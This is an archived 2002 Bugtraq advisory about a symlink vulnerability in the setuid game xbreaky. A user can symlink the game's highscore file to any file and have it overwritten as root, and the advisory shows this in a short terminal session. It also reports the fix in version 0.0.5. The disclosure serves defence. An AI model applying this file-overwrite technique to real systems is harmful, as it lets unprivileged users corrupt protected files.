[27013] in bugtraq
xbreaky symlink vulnerability
daemon@ATHENA.MIT.EDU (Marco van Berkum)
Thu Sep 12 12:41:16 2002
Message-ID: <3D80C09E.4552614E@obit.nl>
Date: Thu, 12 Sep 2002 18:28:14 +0200
From: Marco van Berkum <m.v.berkum@obit.nl>
Reply-To: m.v.berkum@obit.nl
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
-----------------------------------------------------------------------
Title: xbreaky symlink vulnerability
Author: Marco van Berkum
Classification: High risk
Date: 12/09/2002
Email: m.v.berkum@obit.nl
Company: OBIT
Company site: http://www.obit.nl
Personal website: http://ws.obit.nl
-----------------------------------------------------------------------
About xbreaky
-------------
xbreaky is a breakout game for X written by Dave Brul which can be downloaded
from http://xbreaky.sourceforge.net. xbreaky is added to the OpenBSD ports tree,
NetBSD tree and possibly others.
Problem
-------
By default xbreaky is installed as suid and can be abused to overwrite any file
on the filesystem, by any user.
Vulnerable versions
-------------------
All versions prior to 0.0.5
Exploit
-------
xbreaky uses $HOME/.breakyhighscores to write the highscores to, when
$HOME/.breakyhighscores is symlinked to another file (*any* file) it simply
overwrites it as root user.
Example
-------
root@animal:/home/marco# echo "bla" >rootfile
root@animal:/home/marco# chmod 600 rootfile
root@animal:/home/marco# exit
logout
marco@animal:~$ ln -s rootfile .breakyhighscores
marco@animal:~$ xbreaky
Now I play a game and set highscore as user "lol", then I exit the game.
Its a nice game btw :)
marco@animal:~$ cat rootfile
cat: rootfile: Permission denied
marco@animal:~$ su -
Password:
root@animal:~# cat /home/marco/rootfile
lol <- voila, our highscore user
Author's response and solution
------------------------------
The author corrected the problem and released xbreaky 0.0.5
Credits
-------
Thanks to Dennis Oelkers for testing.
--
find / -user your -name base -exec chown us:us {}\;
----------------------------------------
| Marco van Berkum / MB17300-RIPE |
| m.v.berkum@obit.nl / http://ws.obit.nl |
----------------------------------------
